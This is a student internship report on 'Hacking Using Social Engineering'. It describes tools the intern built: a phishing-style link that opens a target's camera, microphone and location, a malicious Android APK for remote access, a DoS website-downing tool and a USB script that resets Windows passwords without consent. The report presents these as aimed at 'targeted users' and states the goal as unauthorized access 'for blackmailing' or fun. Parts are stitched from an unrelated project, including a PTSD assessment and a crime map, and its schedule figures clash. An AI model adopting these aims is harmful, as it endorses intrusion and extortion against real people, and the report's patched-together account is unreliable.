Ethical Hacking Report

Hacking Using Social Engineering
AN INTERNSHIP REPORT
Submitted by
Kshatriya Samir Singh Manoj Kumar
GTU Enrollment No.: 190670107047
In fulfillment for the award of the degree
of BACHELOR OF
ENGINEERING
in
Computer Engineering
SAL Institute of Technology and Engineering Research,

Ahmedabad
Gujarat Technological University, Ahmedabad
May, 2023
SAL Institute of Technology and Engineering Research
opposite Science City, Sola, Ahmedabad, Gujarat 380060.
DECLARATION
I hereby declare that the Internship report submitted along with the
Project entitled Hacking Using Social Engineering submitted in
fulfillment for the degree of Bachelor of Engineering in Computer
Engineering to Gujarat Technological University, Ahmedabad, is a
bonafide record of original project work carried out by me at TOPS
Technologies Pvt. Ltd. under the supervision of Mrs. Anjani Suthar and
that no part of this report has been directly copied from any students’
reports or taken from any other source, without providing due reference.
Name of the Student Sign of the Student
1. Kshatriya Samir Singh Manoj Kumar
Gujarat Technological University i SALITER

ACKNOWLEDGEMENT
The completion of any project brings with it a sense of satisfaction, but it is never
complete without thanking those individuals who made it possible and whose
constant support has crowned our efforts with triumph. One cannot even imagine
the power of the force that guides us all and neither can we succeed without
acknowledging it.
I would like to express my gratitude to Prof. Sudha Patel, Head of the Department
of Computer Engineering, SAL Institute of Technology and Engineering Research,
Ahmedabad, for encouraging and inspiring me to carry out the project. Iwould also
like to thank my internal guide, Mrs. V. Saganya for her expert guidance,
encouragement and valuable suggestions at every step of the project. I would also
like to thank all the staff members of the institute for providing me with the
required facilities and support towards the completion of the project.
I would also like to take this opportunity to thank my external guide, Mrs. Anjani
Suthar of Tops Technologies Pvt. Ltd., for mentoring me in the entire internship
and providing me with the required resources and guidance during the course of the
project.
Gujarat Technological i SALIT

ABSTRACT
The industrial training is as important as theoretical knowledge, considering the

rapidly changing technologies in the field of computer and information technology.
I completed the internship in the field of Ethical Hacking, at TOPS

TECHNOLOGIES PVT. LTD. The project definition that I had been assigned to is
titled: ‘Hacking Using Social Engineering’ that aims at exploiting vulnerabilities
in electronic systems for the purpose of gaining unauthorized access to those
systems. It uses a variety of techniques and methods to access electronic systems,
including phishing, social engineering, and password guessing.
It includes various steps before Hacking a System, like Footprinting, Network

Scanning and Enumeration, Gaining Access and Maintaining it and clearing the tracks.
The objective of the internship was to train in the field of "Hacking and
Securing Sensitive information and system information" with hacking tools and
programming language (C++, C#, Python, JSON, HTML, CSS, JS, etc..) and
implement the knowledge gained into a practical world to make a good contribution
in the society. Hence, its vision and primary aim are to help and guide client to a
safer side so that they can secure their private information.

List of Figures
Fig 3.1 Incremental Model Diagram........................................................................16
Fig 3.2 Development Stages.....................................................................................17
Fig 3.3 Project Plan..................................................................................................21
Fig 3.4 Gantt Chart...................................................................................................21
Fig 5.1 Starting the Bash file....................................................................................29
Fig 5.2 Creation of localhost....................................................................................29
Fig 5.3 Conversion of localhost into global URL link.............................................30
Fig 5.4 Login Page....................................................................................................30
Fig 5.5 creation of malicious link for accessing a device.........................................31
Fig 5.6 Copying the link for sending to the target....................................................31
Fig 5.7 Sending the copied link to the target............................................................32
Fig 5.8 Pop up window that the target user will get for accessing the link..............32
Fig 5.9 Fetching the details of target after the link has been clicked on..................33
Fig 5.10 Accessing the camera.................................................................................33
Fig 5.11 Starting the Android.py file........................................................................36
Fig 5.12 Building Android malicious apk file..........................................................36
Fig 5.13 Creation of Apk File...................................................................................37
Fig 5.14 Targeting the Website................................................................................39
Fig 5.15 Home page of the Application...................................................................41
Fig 5.16 Menu Pop up..............................................................................................42
Fig 5.17 Selection from the options for obtaining geographical data......................42
Fig 5.18 Fetching of data..........................................................................................43
Fig 5.19 Social Engineering Attacks........................................................................44
Fig 5.20 Types of Social Engineering Attacks.........................................................44
Fig 7.1 Surprise Visit Photograph…........................................................................47

List of Tables
Table 3.1 Summary Table.....................................................................................22
Table 6.1 Test Cases Table...................................................................................46
Gujarat Technological v SALIT

ABBREVIATIONS
1. SDLC – Software Development Lifecycle
2. HTML- Hyper Text Markup Language
3. CSS- Cascading Style Sheets
4. ER- Entity Relationship
5. JS- JavaScript
6. VS- Visual Studio
7. PEP- Python Enhancement Proposals
8. ER – Entity Relationship
9. C# - C Sharp
10. PIP – Pip Install Package
11. CMD – Command Prompt
12. VM – Virtual Machine
Gujarat Technological vi SALIT

Table of Contents
Declaration..................................................................................................................i
Acknowledgement......................................................................................................ii
Abstract.....................................................................................................................iii
List of Figures............................................................................................................iv
List of Tables..............................................................................................................v
Abbreviations............................................................................................................vi
Table of Contents.....................................................................................................vii
Chapter 1 Overview of the Company....................................................................1
1.1 History........................................................................................................................1
1.2 Different Products/Scope Of Work............................................................................2
1.3 Capacity Of Company................................................................................................2
Chapter 2 Overview of different processes in the company.................................3
2.1 Details of work carried out in each department..........................................................3
2.2 Technical Specifications of Major Equipment used in each department...................4
2.3 Schematic Layout for manufacturing end product.....................................................5
2.4 Stages Of Productions................................................................................................7
Chapter 3 Introduction to Internship Report.......................................................8
3.1 Internship Summary...................................................................................................8
3.2 Purpose.......................................................................................................................9
3.3 Objective.....................................................................................................................9
3.4 Scope........................................................................................................................10
3.5 Technology Review..................................................................................................11
3.5.1 Technology Review..................................................................................................11
3.5.2 Justification of Technology......................................................................................14
3.6 Internship Planning…...............................................................................................15
3.6.1 Project Development Approach and Justification....................................................15
3.6.2 Internship Effort Estimation.....................................................................................18
3.6.3 Roles and Responsibilities........................................................................................18
3.6.4 Group Dependencies.................................................................................................19

3.7 Internship Scheduling…...........................................................................................20
Chapter 4 System Analysis....................................................................................24
4.1 Study of Current System..........................................................................................24
4.2 Weaknesses of current system..................................................................................24
4.3 Requirements of new System...................................................................................24
4.4 Feasibility Study.......................................................................................................25
4.4.1 System’s contribution to the overall objectives of organization...............................25
4.4.2 System’s feasibility with cost and time constraints.................................................25
4.4.3 System’s integration with other systems already in place........................................25
4.5 Features of the proposed system..............................................................................25
4.6 Main modules and processes of proposed system....................................................26
4.7 Selection of hardware and software.........................................................................27
Chapter 5 System Design.......................................................................................28
5.1 Interface Design........................................................................................................28
5.1.1 Accessing Device using Web URL Link..................................................................28
5.1.2 Android Device Hacking..........................................................................................34
5.1.3 LOIWD (Low Orbit Ion Website Down).................................................................38
5.1.4 Location Tracker.......................................................................................................40
5.2 Process and Structure Diagrams...............................................................................44
Chapter 6 Testing...................................................................................................45
6.1 Testing Plan and Strategy.........................................................................................45
6.2 Test result and analysis............................................................................................45
6.2.1 Test cases.................................................................................................................46
Chapter 7 Conclusion and Discussion..................................................................47
7.1 Overall analysis of internship viabilities..................................................................47

7.2 Photograph and Date of Surprise Visit by Mentor...................................................47
7.3 Problems encountered and possible solutions..........................................................48

7.4 Summary of internship and Report...........................................................................48
References................................................................................................................49

Project ID: Chapter
CHAPTER 1: OVERVIEW OF THE COMPANY
1.1 HISTORY
"TOPS" Stands for Training Outsourcing Placement Services. TOPS Technologies is a

rapidly growing company that provides Job Oriented Training, Web and Mobile Design -
Development with Testing & Support services along with other professional placement and
recruitment services and solutions.
They have worked for and have provided services to the 6 of the top 10 Fortune 500
companies of the world. Their team has worked in the US for more than 10 years and has
management degrees from the US.
TOPS Technologies was awarded the TOP 2008 Business in the US for the year 2008-2009.
Started with a vision of bridging the gap between skills required and talent created by
colleges, today TOPS Technologies is one of the largest IT Training and Finishing Schools
with expertise in ASP.Net, PHP, Java, iPhone, Android, Software Testing, SEO, Web
Design. Today they have Software Development training centers in Ahmedabad, Vadodara,
Rajkot, Surat, Navsari, Mehsana, Junagadh, Indore, Bhopal, Jabalpur, Noida, Kota, Jaipur,
Nagpur, Dehradun.
At TOPS Technologies we don’t like to be termed as just an Outsourcing company; we

believe in becoming your solutions partner. Our approach of “You think it, we build it”
gives us the perfect mantra for the work we do. Our implementations have benefited
organizations in creating the best solutions along with major cost savings. Today we have a
team of 100+ developers with varied expertise in creating some of the best web/mobile
applications in the market.
TOPS Technologies offers IT Outsourcing Services includes:

• Web Design and Development Services
• Mobile Apps Development Services (Android, iPhone)
• eCommerce Development Services
Gujarat Technological 1 SALIT

Project ID: Chapter
1.2 DIFFERENT PRODUCTS/SCOPE OF WORK:
TOPS Technologies has worked on several domains for Android and Windows apps along
with cross platform apps too. Some of the company’s works include:
Organizing a Job Fest where 50+ Companies interview Candidates for their Job Openings.
This event is organized at a Convention center.
 Maximum salary offered by companies during JobFest for a fresher has been 7.2 lacs
 Each student interviews with maximum companies in 1 day
 Companies get to interact with multiple candidates and offer maximum salaries
 Candidates select the best Job Offers
Apart from these projects, the company offers wide range of services like Web
Development, Specialized Courses, Live Project Training, Digital Marketing services and
much more.
1.3 CAPACITY OF COMPANY:
TOPS Technologies offer a wide range of services like app development for Android,
Windows, web development, digital marketing solutions, UI/UX design, Data science and
solutions.
TOPS Technologies Pvt Ltd is established in 2008-2009. It believes in working with less
but highly qualified and experienced developers. With a team of 19+ offices in India,
followed by standard software development process.

Project ID: Chapter
CHAPTER 2: OVERVIEW OF DIFFERENT PROCESSES IN

THE COMPANY
2.1 DETAILS OF WORK CARRIED OUT IN EACH DEPARTMENT
There are different departments in the company: Project management, Technical

Management, Software Development, Web Development, App Development and Testing,
Hacking Training.
Project planning is part of project management, which relates to the use of schedules such as
Gantt charts to plan and subsequently report progress within the project environment.
Initially, the project scope is defined and the appropriate methods for completing the project
are determined. Following this step, the durations for the various tasks necessary to
completethe work are listed and grouped into a work breakdown structure. Project planning
is often used to organize different areas of a project, including project plans, workloads and
the management of teams and individuals.
Project Management System has six major modules of Admin, Manage Application, Test
Management, Process Management, Manage Comment, Reports. We analyzed the overall
complexity of each of these modules and it was found that the project will require
approximately 12 weeks to get completed, so we planned accordingly.
Web and app developers work on different project definitions to build a fully working
model. Testing department is in charge of testing the working of different elements and
functionalities in the project built by developers and provide feedback status to developers
pointing out errors if any.

Project ID: Chapter
2.2 TECHNICAL SPECIFICATIONS OF MAJOR EQUIPMENT USED

IN EACH DEPARTMENT.
 Hardware: -
 Minimum screen resolution: 1024*768

 Processor minimum: 500mhz Intel Core i5 workstationor equivalent.
 Memory minimum: 4 GB recommended: 8 GB RAM
 Disk space :30 GB of free disk space recommended: 50 GB
 Software: -
 Front End Tool: - HTML, CSS, Bootstrap4, SASS, JS.

 Back End Tool: - Python 3.8, NodeJs, ExpressJs, C++, C#
 Frame work: - ReactJS, AngularJS
 Languages: - C#, Bash Scripting, Python and it’s dependencies
 IDE: - Visual Studio
 Operating System: - Ubuntu/Kali Linux/Parrot OS/Windows/Termux.
 Database: - SQLite, MySQL, MongoDb

Project ID: Chapter
2.3 SCHEMATIC LAYOUT FOR MANUFACTURING OF END

PRODUCT
Project Scheduling is the culmination of a planning activity that is primary component of

software project management. When combined with estimation methods and risk analysis,
scheduling establishes a road map for the project management.
Scheduling begins with the process composition. The characteristics of the project are used
to adapt an appropriate task set for the work to be done. The task network is used tocompute
the critical project path, a time line chart and a variety of project information. When creating
a software project schedule, the planner begins with a set of tasks. If automated tools are
used, the work breakdown is input as a task network or task outline. Effort, duration, and
start date are then input for each task. In addition, tasks may be assigned to specific
individuals. As a consequence of this input, a timeline chart, also called a Gantt chart is
generating. A Timeline Chart can be developed for the entire project. Timeline Charts depict
a part of a software project schedule
The incremental build model is a method of software development where the model is
designed, implemented and tested incrementally (a little more is added each time) until the
product is finished. It involves both development and maintenance. The product is defined
asfinished when it satisfies all of its requirements. This model combines the elements of the
waterfall model with the iterative philosophy of prototyping.
Iterative and Incremental development is a combination of both iterative design or iterative

method and incremental build model for development. "During software development, more
than one iteration of the software development cycle may be in progress at the same time."
and "This process may be described as an "evolutionary acquisition" or "incremental build"
approach."
In incremental model the whole requirement is divided into various builds. During each
iteration, the development module goes through the requirements, design, implementation
and testing phases. Each subsequent release of the module adds function to the previous
release. The process continues till the complete system is ready as per the requirement.

Project ID: Chapter
The key to successful use of an iterative software development life-cycle is rigorous

validation of requirements, and verification & testing of each version of the software against
those requirements within each cycle of the model. As the software evolves through
successive cycles, tests have to be repeated and extended to verify each version of the
software.
Like other SDLC models, Iterative and incremental development has some specific
applications in the software industry. This model is most often used in the following
scenarios:
 Requirements of the complete system are clearly defined and understood.
 Major requirements must be defined; however, some functionalities or requested

enhancements may evolve with time.
 There is a time to the market constraint.
 A new technology is being used and is being learns by the development team while
working on the project.
Resources with needed skill set are not available and are planned to be used on contract
basis for specific iterations.

Project ID: Chapter
2.4 STAGES OF PRODUCTIONS
approximately 14 weeks completing, so we planned accordingly.
We decided to follow the SDLC i.e., Software Development Life Cycle while planning
various phases of our project. This method consists of following activities:
1. Determination of system requirements

2. System Analysis
3. Design of system
4. Development of software
5. System Testing
6. Implementation and Evaluation
There are some high-risk features and goals which may change in the future.
 Integration and Testing: All the units developed in the implementation phase are integrated
into a system after testing of each unit. Post integration the entire system is tested for any
faults and failures.
 Deployment of system: Once the functional and nonfunctional testing is done, the product is
deployed in the customer environment or released into the market.
 Maintenance: There are some issues which come up in the client environment. To fix those
issues patches are released. Also, to enhance the product some better versions are released.
Maintenance is done to deliver these changes in the customer environment.

Project ID: Chapter
CHAPTER 3: INTRODUCTION TO INTERNSHIP REPORT
3.1 INTERNSHIP SUMMARY
The 12 weeks internship under "TOPS TECHNOLOGY" included extensive training in

various tools, programming language, operating system, network information and
vulnerabilities along with its implementation in the project modules assigned to me.
In the first 7-8 weeks, I understood the fundamentals of language's, network information,
finding vulnerabilities, frameworks and performed various coding tasks on different
concepts like loops, loop statements, operators, functions, lists, tuples, arrays, OOP
concepts, random modules, etc.
In the following weeks, I understood the working of JS framework, Database working,

Kernel system, Firewall and bypassing firewall, finding threat loops, bypassing system how
to connect web application to the database, etc. I also learnt about the basics of HTML, CSS,
JavaScript, Bootstrap, how to make a responsive design and other topics to facilitate my
understanding of entire front-end and back-end development.
Later, I learned how to bypass operating system using bash scripting, password changing
without user permission, accessing android mobile remotely concepts and usage of 3
important libraries in Python for requests, colorama, psutil, python3(version), etc.
Finally, I implemented these concepts to develop the project, according to roles and
responsibilities assigned to me. Next, were the days of testing and evaluation to make sure
that the tools and application was smooth, gave accurate results and was overall efficient.

Project ID: Chapter
3.2 PURPOSE
The Purpose of this project is to develop a tool which can scan a network for finding
vulnerabilities, creating an application which is created using python, python libraries, bash
scripting as well as a kotlin program which can generate a malicious file in order to bypass
the firewall as well as accessing the android device remotely and creating a bash
scripting file to change the windows 7&10 operating system user password without user
permission.
3.3 OBJECTIVE
Industrial training is as important as theoretical knowledge, considering the rapidly changing

technologies in the field of computer and information technology. The objective of the
internship was to gain practical experience through in-depth training in the field of 'Hacking-
World', and using the knowledge and exposure gained to develop an application that has a
positive social impact.
The objective of this internship is to implement such tools and application in our project that
serves as a platform for scanning a network for finding vulnerabilities, creating an
application which is created using python, python libraries, bash scripting as well as a kotlin
program which can generate a malicious file in order to bypass the firewall as well as
accessing the android device remotely and creating an bash scripting file to change the
windows 7&10 operating system user password without user permission.
The ultimate aim is to enhance the scope of this project to make such tools which can be
used to bypass any system and accessing a device which uses internet.

Project ID: Chapter
3.4 SCOPE
The scope of the proposed system:
 Client can use the following tools to scan network vulnerabilities.
 Client can use the developed tools to generate a link which can be given to the targeted user
in form of Qr-code or some custom link to access and device mic, camera and location.
 Client can use the tools which is created to down any targeted website server performance
using the concept of DOS (Denial Of Services) and DDOS (Distributed Denial Of Services)
attack.
 Client can also write a bash scripting file which can bypass the windows 7&10 system just
you have to upload that scripting file in pendrive and plugin to a targeted device and boot it
up and change the user's device password.
 Client can also use one tool (IP tracker) which is basically use to take out all information of
particular IP address such as location, country region, company sim name, post card
number,etc.

Project ID: Chapter
3.5 TECHNOLOGY REVIEW
3.5.1 Technology Review
o Python
Python is an interpreted, object-oriented, high-level programming language with dynamic

semantics. Its high-level built-in data structures, combined with dynamic typing and
dynamicbinding, make it very attractive for Rapid Application Development, as well as for
use as a scripting or glue language to connect existing components together. Python's
simple, easy to learn syntax emphasizes readability and therefore reduces the cost of
program maintenance. Python supports modules and packages, which encourages program
modularity and code reuse. The Python interpreter and the extensive VS.
Often, programmers fall in love with Python because of the increased productivity it
provides. Since there is no compilation step, the edit-test-debug cycle is incredibly fast.
Debugging Python programs is easy: a bug or bad input will never cause a segmentation
fault. Instead, when the interpreter discovers an error, it raises an exception. When the
program doesn't catch the exception, the interpreter prints a stack trace. A source level
debugger allows inspection of local and global variables, evaluation of arbitrary expressions,
setting breakpoints, stepping through the code a line at a time, and so on. The debugger is
written in Python itself, testifying to Python's introspective power. On the other hand, often
the quickest way to debug a program is to add a few print statements to the source: the fast
edit-test-debug cycle makes this simple approach very effective.

Project ID: Chapter
o C#
C# is pronounced "C-Sharp".
It is an object-oriented programming language created by Microsoft that runs on the

.NETFramework.
C# has roots from the C family, and the language is close to other popular languages
likeC++ and Java.
Why Use C#?

It is one of the most popular programming languages in
the worldIt is easy to learn and simple to use
It has a huge community support
C# is an object-oriented language which gives a clear structure to programs and allows
codeto be reused, lowering development costs
As C# is close to C, C++ and Java, it makes it easy for programmers to switch to C# or vice
versa
C# is used for:
Mobile applications
Desktop
applicationsWeb
applications Web
services
Web
sites
Games
VR
Database applications
And much, much more!
History of C#:
The first version was released in year 2002. The latest version, C# 11, was released in
November 2022.

Project ID: Chapter
o Bash Shell Scripting
Bash Scripting is a powerful part of system administration and development used at an

extreme level. It is used by the System Administrators, Network Engineers, Developers,
Scientists, and everyone who use Linux/Unix operating system. They use Bash for system
administration, data crunching, web application deployment, automated backups, creating
custom scripts for various pages, etc.
In Computer programming, a script is a set of commands for an appropriate run time

environment which is used to automate the execution of tasks.
It is a plain text file containing a set of various commands that we usually type in the
command line. It is used to automate repetitive tasks on Linux filesystem. It might include a
set of commands, or a single command, or it might contain the hallmarks of imperative
programming like loops, functions, conditional constructs, etc. Effectively, a Bash script is a
computer program written in the Bash programming language.
History:
Bash is a Unix shell and command language written by Brian Fox for the GNU Project as a
free software replacement for the Bourne shell. First released in 1989, it has been used as the
default login shell for most Linux distributions. Bash was one of the first programs Linus
Torvalds ported to Linux, alongside GCC.
Richard Stallman at that time began GNU project with Free Software Foundation (FSF) to
create a UNIX-compatible operating system aiming everything as open-source. There wasa
lack of progress in the revolution. He needed a free shell that could run existing shell scripts.
It was imperative to a completely open-source system built as one of the few projects he
funded with FSF. Then on January 110, 1988, Brian Fox (FSF employee) began coding on
Bash and released Bash as beta, version 0.99 on June 8, 1989.
Features:
 Directory manipulation, with the pushd, popd, and dirs commands.
 Job control, including the fg and bg commands and the ability to stop jobs with CTRL-Z.
 Brace expansion, for generating arbitrary strings.
 Tilde expansion, a shorthand way to refer to directories.
 Aliases, which allow you to define shorthand names for commands or command lines.
 Command history, which lets you recall previously entered commands.

Project ID: Chapter
3.5.2 Justification Of Technology
A 'Hacking Using Social Engineering' is a collection of modular tools that abstracts away
much of the difficulty–and repetition–inherent in Hacking World. For example, most tools
need the same basic functionality: the ability to track only IP address, set URL routes,
scanning vulnerabilities, handle security properly, and so on. Rather than recreate all of this
from scratch, programmers over the years have created web frameworks in all the major
programming languages: python, bash scripting, and Express in JavaScript among many,
many others.
Libraries inherited Python’s dependencies approach and includes out-of-the box support
forcommon tasks in Hacking, including:
 User authentication
 Testing
 URL routes, creating clone of any website
 Creating tools
 Security and performance upgrades
 Support for multiple database backends
The overall task is to just gain the unauthorize access and capturing the sensitive
informationof a targeted user for any purpose (blackmailing to take some rewards or for fun
purpose, etc.).

Project ID: Chapter
3.6 INTERNSHIP PLANNING
 Internship planning is part of project management, which relates to the use of schedules such
as Gantt charts to plan and subsequently report progress within the project environment.
 Initially, the project scope is defined and the appropriate methods for completing the project
are determined. Following this step, the durations for the various tasks necessary to
complete the work are listed and grouped into a work breakdown structure.
 Internship planning is often used to organize different areas of a project, including project
plans, workloads and the management of teams and individuals.
 After completion of initial training, different modules were assigned to us individually

which we had to work on, under the guidance or our industry mentor and internal guide.
 Different modules include: Front-end development, Back-end development, Research work

of collecting data and setting assessment forms, implementing data science libraries like
Pandas and Matplotlib, Testing.
3.6.1 Project Development Approach And Justification
Planning before any activity is very much important. And if it is planned nicely, then
successis guaranteed.
approximately 14 weeks completing, so we planned accordingly.
We decided to follow the SDLC i.e., Software Development Life Cycle while planning
various phases of our project. This method consists of following activities:
1. Determination of system requirements

2. System Analysis
3. Design of system
4. Development of software
5. System Testing
6. Implementation and Evaluation

Project ID: Chapter
The incremental build model is a method of software development where the model is
designed, implemented and tested incrementally (a little more is added each time) until the
product is finished. It involves both development and maintenance. The product is defined
asfinished when it satisfies all of its requirements. This model combines the elements of the
waterfall model with the iterative philosophy of prototyping.
Following is the pictorial representation of Iterative and Incremental model:
Fig 3.1 Iterative And Incremental

Model
Iterative and Incremental development is a combination of both iterative design or iterative

method and incremental build model for development. "During software development, more
than one iteration of the software development cycle may be in progress at the same time."
and "This process may be described as an "evolutionary acquisition" or "incremental build"
approach."
In incremental model the whole requirement is divided into various builds. During each
iteration, the development module goes through the requirements, design, implementation
and testing phases. Each subsequent release of the module adds function to the previous
release. The process continues till the complete system is ready as per the requirement.
The key to successful use of an iterative software development life-cycle is rigorous

validation of requirements, and verification & testing of each version of the software against
those requirements within each cycle of the model. As the software evolves through
successive cycles, tests have to be repeated and extended to verify each version of the
software.

Project ID: Chapter
Like other SDLC models, Iterative and incremental development has some specific
applications in the software industry. This model is most often used in the following
scenarios:
 Requirements of the complete system are clearly defined and understood.
 Major requirements must be defined; however, some functionalities or requested

enhancements may evolve with time.
 There is a time to the market constraint.
 A new technology is being used and is being learns by the development team while working
on the project.
Resources with needed skill set are not available and are planned to be used on
contract basis for specific iterations.
 There are some high-risk features and goals which may change in the future.
 Integration and Testing: All the units developed in the implementation phase are integrated
into a system after testing of each unit. Post integration the entire system is tested for any
faults and failures.
 Deployment of system: Once the functional and nonfunctional testing is done, the product is
deployed in the customer environment or released into the market.
 Maintenance: There are some issues which come up in the client environment. To fix those
issues patches are released. Also, to enhance the product some better versions are released.
Maintenance is done to deliver these changes in the customer environment.
Fig 3.2 Development Stages

Project ID: Chapter
3.6.2 Internship Effort Estimation
Effort Estimation:
Each company determines the output it expects from its team members. Let us call the
average output of a team member per man-hour as the unit output. Assume that one has to
deliver an end-to-end login module's functionality for an application. The time spent on the
login functionality should include the corresponding time required for gathering the
requirements, doing a requirement analysis, architecture inputs, form design, object/class
design, implementing the business rules, data validation and storage, framework (i.e., code
for login module's constants, enumerations, utilities), testing, debugging, deployment up to
user acceptance, etc.
Now, the estimator has to figure out how many man-hours it would take to complete the
login module, keeping all these factors in mind. The sequence of work and dependencies
should be considered as they do cause delays in completion.
For example,
 Client can use the developed tools to generate a link which can be given to the targeted user
in form of Qrcode or some custom link to access and device mic, camera and location.
 Client can use the tools which is created to reduce any targeted website server performance
using the concept of DOS (Denial Of Services) and DDOS (Distributed Denial Of Services)
attack.
 Client can also write a bash scripting file which can bypass the windows 7&10 system just
you have to upload that scripting file in pendrive and plugin to a targeted device and boot it
up and change the user's device password.
3.6.3 Roles And Responsibilities
As an intern, there are different roles and responsibilities that one has to fulfill:
 Understand and undergo extensive training given by mentors in the field of Ethical Hacking.
 Fulfill the tasks given by supervisors.
 Conduct research work for the implementation of project.
 Performtesting for the project under the supervision of mentors.
 Attend meetings with mentors for giving report of daily work.
 Tools development using various languages.
 Creating fake https website to test our tools.

Project ID: Chapter
3.6.4 Group Dependencies
The project that I was assigned under, is titled ‘Hacking Using Social Engineering’. The
modules where I had to work on included: gathering resources, implementing tools and
applications, generating apk files for remotely accessing any android device, etc.
I also developed such application under my mentor guidance which can actual slow down
the website access performance as well as a website which can generate such link by using
which we can access any device's camera, mic and location.

Project ID: Chapter
3.7 INTERNSHIP SCHEDULING
 Project Scheduling is the culmination of a planning activity that is primary component of

software project management.
 When combined with estimation methods and risk analysis, scheduling, establishes a road
map for the project management.
 Scheduling begins with the process composition. The characteristics of the project areused to
adapt an appropriate task set for the work to be done.
 The task network is used to compute the critical project path, a time line chart and a variety
of project information.
 When creating a software project schedule, the planner begins with a set of tasks. If
automated tools are used, the work breakdown is input as a task network or task outline.
Effort, duration, and start date are then input for each task. In addition, tasks may be
assigned to specific individuals.
 As a consequence of this input, a timeline chart, also called a Gantt chart is generating. A
Timeline Chart can be developed for the entire project. Timeline Charts depict a part of a
software project schedule.
 All project tasks are listed in the left-hand column. The horizontal bars indicate the duration
of each task. When multiple bars occur at the same time on the calendar, task concurrency is
implied. The diamonds indicate milestones, which indicate the place where our project
reach.

Project ID: Chapter
1 Requirements 25 27
2 Analysis and Module Specification 32 35
3 Designing 40 50
4 Coding 55 60
5 Documentation 15 17
Total days 167 189
Fig. 3.3 Project Plan
Fig 3.4 Gannt Chart

Project ID: Chapter
Table 3.1 Summary Table
Week 1 Introduction to Ethical Hacking and the first

module Footprinting and Reconnaissance was
started.
Week 2 Various Practicals on Footprinting using Google
Alerts, Google Forms, Google Finance and other
Job sites and Social Sites were performed.
Week 3 Footprinting using Google Advanced Techniques,
Social Engineering, Website Footprinting,
Competitive Intelligence Gathering, WHOIS
Lookup Tool was taught and the practicals were
performed for the same.
Week 4 Extracting Website Information using
www.archive.org. Installation and Implementation
of Maltego Tool, Installation of VMWare
Workstation Pro, Kali Linux and Windows 7 was
done. Next Module – Scanning networks was
started. Zenmap was installed and it’s working was
briefed by performing the practicals on it.
Week 5 Port Scanning, Banner Grabbing, Vulnerability
Scanning was taught and discussed. Nessus Tool
Installation was done and it’s working was taught.
Network Topology Mapper, Proxy Chaining was
briefed, taught and discussed.
Week 6 Remaining Module was finished and new module –
Enumeration was started. All the practicals were
performed on the tools given in the module. New
module – Hacking Using Social Engineering was
started and different password cracking methods
and authentication methods were briefed, taught
and discussed. Keyloggers and its types were also
briefed and taught.

Project ID: Chapter
Week 7 Introduction to Spyware, Types of Spyware, What
is Steganography, What is Rootkits, What is NTFS
Data Streams and Manipulation was taught and
discussed.
Week 8 What is Steganalysis, Steganography Detection
Tools, Tools for Covering and Clearing Tracks
were briefed and taught. New Module i.e., Malware
Threats was started. Its basic introduction was
given. What are Trojans, What are Wrappers,
Crypters and exploit Kits was briefed and taught
along with the techniques through which Anti-Virus
can be evaded.
Week 9 The practicals of SoftPerfect Network Scanner tool,
Various Password Cracking methods, SpyTech
SpyAgent tool, Rootkits as well as the practicals of
various Steganography techniques were done.
Week 10 Various tools that are used for creating Trojans
were briefed and the practicals were performed
accordingly. New module – Sniffing was started.
Various types of sniffing, it’s working and its
threats were briefed. What is Wiretapping, What is
a MAC Address, What is a CAM Table, How it
works, What is MAC flooding, MAC Spoofing and
different DNS Poisoning Techniques with it’s type
were taught. Various Sniffing Tools were also
briefed and discussed.
Week 11 New Modules – Social Engineering, Session
Hijacking and Hacking Webservers were taught and
discussed in detail.
Week 12 New Modules – Hacking Web Applications, Cloud
Computing, Hacking Wireless Networks and
Cryptography were taught and discussed in detail.

Project ID: Chapter
CHAPTER 4: SYSTEM ANALYSIS
4.1 STUDY OF CURRENT SYSTEM
The current system relies on the feature, where users can share their unfortunate experiences
about hacking on a platform that resembles other social media platforms. This way, people
can be aware about the ways in which the hackers are targeting the users. However, there is
usually no map provided to help users efficiently and notice what crimes occurs in which
areas. Moreover, the anonymity feature is usually absent that leads to loss of integrity and
privacy of the victims not talking about it at all due to insensitive remarks and opinions that
they receive in return.
4.2 WEAKNESSES OF CURRENT SYSTEM
 If the firewalls are on in the system, then it might create a problem for some tools to operate
on it.
 Weak management
 Failing to secure privacy and integrity of users
 Poor user experience
 Static system
 No proper legal resources for educational purposes
 Lack of knowledge about current technology
 The Windows Protection is usually on in most of the systems so it might be difficult to
overlap that security.
 If there is any Anti-Virus in the system then also it is difficult to hack a system.
4.3 REQUIREMENTS OF NEW SYSTEM
 The system should be up to date.

 Better front-end management
 Better back-end management
 Trying to decrease error issues during runtime.
 An assessment option to check symptoms of PTSD, anxiety, trauma, etc.
 VMWare Workstation Pro – 17 should be installed.
 Kali Linux – 2022 should be installed in VMWare.
 Windows 7shouldalso beinstalledin the VMWare.

Project ID: 2858 Chapter
4.4 FEASILBILITY STUDY
4.4.1 Does The System Contribute To The Overall Objectives Of The Organization?
The proposed system effectively contributes to the objectives of the organization, which is
to use technology to bring meaningful change in the society.
4.4.2 Can The System Be Implemented Using The Current Technology And Within
The Given Cost And Schedule Constraint?
The system can be implemented using various tools available online and the
available ethicalhacking modules within the cost limits and time constraints.
4.4.3 Can The System Be Integrated With Other Systems Which Are Already In
Place?
The new system can be integrated with other Hacking Methodologies to enhance
thefunctionalities and utilities.
4.5 FEATURES OF THE PROPOSED SYSTEM
Features of the proposed system are:
 Virtual Machine provides an environment for working in different OS simultaneously with

the default OS of the system.
 Various Password Cracking Methods can be used.
 Information Gathering through various Methods can be done.
 Any System can be corrupted using various Virus making Tools.
 Keystrokes can be logged.
 A tool capable of accessing IP address along with the device information which can be used
to identify the location.
 Capabilities of changing the windows (7 & 10) password without user permission.
 An application which can also decrease the performance of any website server just by using
the DOS (Denial Of Service) & DDOS (Distributed Denial Of Service) attack concept.

Project ID: 285899 Chapter 4

4.6 MAIN MODULES AND PROCESSES OF THE PROPOSED
SYSTEM
The different modules that are included are as follows:
 Footprinting and Reconnaissance
 Cryptography and Cloud Computing
 Scanning Networks
 Enumeration
 Malware Threats and Sniffing
 Social Engineering
 Session Hijacking
 Hacking Web Applications, Servers and Wireless Networks

Project ID: Chapter
4.7 SELECTION OF HARDWARE AND SOFTWARE
 Hardware: -
 Minimum screen resolution: 1024*768

 Processor minimum: 500mhz Intel Core i5 workstationor equivalent.
 Memory minimum: 4 GB recommended: 8 GB RAM
 Disk space :30 GB of free disk space recommended: 50 GB
 Software: -
 Front End Tool: - HTML, CSS, Bootstrap4, SASS, JS.

 Back End Tool: - Python 3.8, NodeJs, ExpressJs, C++, C#
 Frame work: - ReactJS, AngularJS
 Languages: - C#, Bash Scripting, Python and it’s dependencies
 IDE: - Visual Studio
